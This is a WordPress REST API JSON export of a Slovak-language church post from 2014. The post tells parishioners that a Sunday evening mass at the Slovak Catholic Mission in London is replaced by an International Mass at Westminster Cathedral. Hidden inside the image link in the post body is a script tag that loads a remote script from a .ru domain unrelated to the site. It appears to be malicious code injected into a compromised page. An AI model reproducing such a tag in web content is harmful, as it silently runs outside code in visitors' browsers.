{"id":18120,"date":"2014-09-14T23:59:35","date_gmt":"2014-09-14T22:59:35","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=18120"},"modified":"2014-09-17T11:28:32","modified_gmt":"2014-09-17T10:28:32","slug":"international-mass-vo-westminsterskej-katedrale","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=18120","title":{"rendered":"International Mass vo Westminsterskej katedr\u00e1le"},"content":{"rendered":"<p><span style=\"color: #ff0000;\"><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/08\/westmisnter-cathedral.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright  wp-image-18121\" alt=\"westmisnter cathedral\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/08\/westmisnter-cathedral-150x150.jpg\" width=\"112\" height=\"112\" srcset=\"https:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/08\/westmisnter-cathedral-150x150.jpg 150w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/08\/westmisnter-cathedral-144x144.jpg 144w\" sizes=\"auto, (max-width: 112px) 100vw, 112px\" \/><script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/a><strong>D\u0148a 28. septembra 2014 ve\u010dern\u00e1 nede\u013en\u00e1 bohoslu\u017eba o 19.30 hod. v kostole Slovenskej katol\u00edckej misie sa nekon\u00e1 !!!!<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><strong>Nahr\u00e1dza ju bohoslu\u017eba vo Westminsterskej katedr\u00e1le o 17.30 hod., kde bude International Mass\u00a0 a kde sa bude \u010d\u00edta\u0165 jedna zo spolo\u010dn\u00fdch modlitieb veriacich (\u013eudovo prosby) po slovensky.<\/strong><\/p>\n<p style=\"text-align: justify;\"><strong>Srde\u010dne poz\u00fdvam v\u0161etk\u00fdch na t\u00fato bohoslu\u017ebu.<\/strong><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>D\u0148a 28. septembra 2014 ve\u010dern\u00e1 nede\u013en\u00e1 bohoslu\u017eba o 19.30 hod. v kostole Slovenskej katol\u00edckej misie sa nekon\u00e1 !!!! Nahr\u00e1dza ju bohoslu\u017eba vo Westminsterskej katedr\u00e1le o 17.30 hod., kde bude International&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=18120\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-18120","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/18120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18120"}],"version-history":[{"count":1,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/18120\/revisions"}],"predecessor-version":[{"id":18122,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/18120\/revisions\/18122"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}